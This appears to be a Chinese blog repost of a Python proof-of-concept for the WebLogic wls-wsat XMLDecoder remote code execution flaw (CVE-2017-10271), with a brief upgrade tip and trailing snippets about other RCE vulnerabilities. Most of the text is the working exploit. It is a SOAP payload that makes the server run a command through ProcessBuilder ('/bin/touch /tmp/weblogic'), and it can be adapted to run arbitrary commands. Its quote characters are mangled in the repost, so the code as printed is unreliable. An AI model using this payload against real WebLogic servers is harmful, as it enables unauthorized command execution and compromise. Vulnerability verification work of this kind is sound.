Weblogic wls RCE 漏洞验证POC

#!/usr/bin/env python
# coding:utf-8
# @Date    : 2017/12/22 17:11
# @File    : weblogic_poc.py
# @Author  : sevck ([email protected])
# @Link    : http://www.qingteng.cn
#-------------------------------------------------------------------------
import requests
import re
from sys import argv

heads = {
    ‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0‘,
    ‘Accept‘: ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8‘,
    ‘Accept-Language‘: ‘zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3‘,
    ‘Content-Type‘: ‘text/xml;charset=UTF-8‘
    }

def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += ‘/wls-wsat/CoordinatorPortType‘
    post_str = ‘‘‘
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="2">
                <void index="0">
                  <string>/bin/touch</string>
                </void>
                <void index="1">
                  <string>/tmp/weblogic</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    ‘‘‘

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception, e:
        response = ""

    if ‘<faultstring>java.lang.ProcessBuilder‘ in response or "<faultstring>0" in response:
        result = "Vulnerability"
        return result
    else:
        result = "No Vulnerability"
        return result

if __name__ == ‘__main__‘:
    if len(argv) == 1:
        print "python weblogic_poc.py url:port"
        exit(0)
    else:
        url = argv[1]
    result = poc(url=url)
    print result

说点修复建议:

个人建议直接更新最新版吧,老版本还是问题太多。昨晚和廖师父聊天中告知又提交了一个weblogic的RCE,已经拿到CVE就在等待发布了

原文地址:http://www.cnblogs.com/sevck/p/8092760.html

时间: 2024-11-09 09:47:18

Weblogic wls RCE 漏洞验证POC的相关文章

WebLogic中WLS 组件漏洞(CVE-2017-10271)专项检测工具

来源: 时间:2017-12-23 00:00:00 作者: 浏览:1929 次 近期安恒信息在应急响应过程中发现有恶意攻击者利用WebLogic漏洞对企业服务器发起大范围远程攻击,攻击成功后植入挖矿后门程序,通过分析发现攻击者利用了Oracle WebLogic中WLS 组件漏洞(CVE-2017-10271).有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视.CVE-2017-10271是一个最新的利用Oracle WebLogic中WLS 组件的远程代码执行漏洞

聊聊 WordPress 5.1.1 CSRF to RCE 漏洞

作者:LoRexxar'@知道创宇404实验室时间:2019年3月14日 2019年3月13日, RIPS团队公开了一篇关于WordPress 5.1.1的XSS漏洞详情,标题起的很响亮,叫做wordpress csrf to rce, https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ 下面我们就来详细聊聊这个漏洞. 关于WordPress防护 早在2017年10月25号,我曾经写过一篇关于WordPress安全机制的文章. https:

Zimbra无需登录RCE漏洞利用

2019年3月13号,一名国外的安全研究员在他的博客上公布了zimbra RCE漏洞相关信息,但其中并未提到一些漏洞利用细节. 经过一段时间努力,根据网上各位大牛的分析和我自己的理解,在此我将整个漏洞的利用过程进行复现. 第一步:利用XXE读取配置文件 这里利用了CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问.为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件. 上图中用红框圈起来的就是zimb

WordPress插件Social Warfare&lt;=3.5.2 无需登录RCE漏洞

该漏洞只存在于Social Warfare插进的3.5.0.3.5.1和3.5.2版本中,其他版本不存在. 2019年3月21日插件作者紧急发布了3.5.3版本以修复高危的RCE漏洞,在<=3.5.2版本中存在一处无需登录即可getshell的RCE漏洞. 漏洞分析 在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php文件中有一处eval()函数,该函数将file_get_contents()读取

WeCenter (最新版) 前台RCE漏洞 (2020-02-22)

漏洞通过phar触发反序列化漏洞. 触发点:./models/account.php 中的 associate_remote_avatar 方法: 搜索全局调用了该方法的地方: ./app/account/ajax.php 路径中的 synch_img_action 方法: 从数据表 users_weixin中取出数据,想要控制此处,就必须要控制这个表. 再次全局搜索 users_weixin 找insert,update等操作. ./models/openid/weixin/weixin.ph

WebLogic XMLDecoder反序列化漏洞复现

参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/ssrf/ docker-compose up -d 这时我们就可以访问docker中weblogic的地址,地址为ubuntu(IP):7001,访问 http://192.168.126.142:7001/ 如下图搭建成功. 检验POC import req

Oracle WebLogic中间件最新漏洞修复补丁以及修复方案说明(2019.7)

---------目录-------- 1. 补丁集修复漏洞说明... 3 1.1 Oracle WebLogic 10.3.6.0.190716. 3 1.2 Oracle WebLogic 12.1.3.0.190716. 3 1.3 Oracle WebLogic 12.2.1.3.190522. 4 2. WLS 内核组件漏洞说明... 5 3. 漏洞修复方案... 5 3.1 WebLogic 10.3.6.0. 5 3.1.1 停应用进程... 5 3.1.2 环境备份... 6 3

Apache Solr Velocity模板注入RCE漏洞复现

一.Apache Solr介绍 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过http get操作提出查找请求,并得到XML格式的返回结果. 二.漏洞描述 Solr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令

Leadersec网上行为(审计)设备系统通用型getshell(无需登录涉及网神&amp;网御星云等厂商)漏洞验证

收到90的通过邮件.也不是什么大牛级文章,关键是分享下个人思路,可以试着投稿.现在国内的最好安全论坛不外乎乌云zone t00ls 以及 九零了,由于某种原因,wooyun暂时关闭,t00ls暂时不开放注册,剩下九零还是可以给管理员投稿注册.ps:希望国内的安全环境能够变好,也希望大家也能够和大牛们一起学习,爬出这个坑 您好,感谢您对九零的支持,恭喜您,您的文章通过审核. 由于论坛现在关闭注册,请您直接回复您所要注册的账号.邮箱. 由管理直接给您创建账号.   目前大四,wooyun小白id是a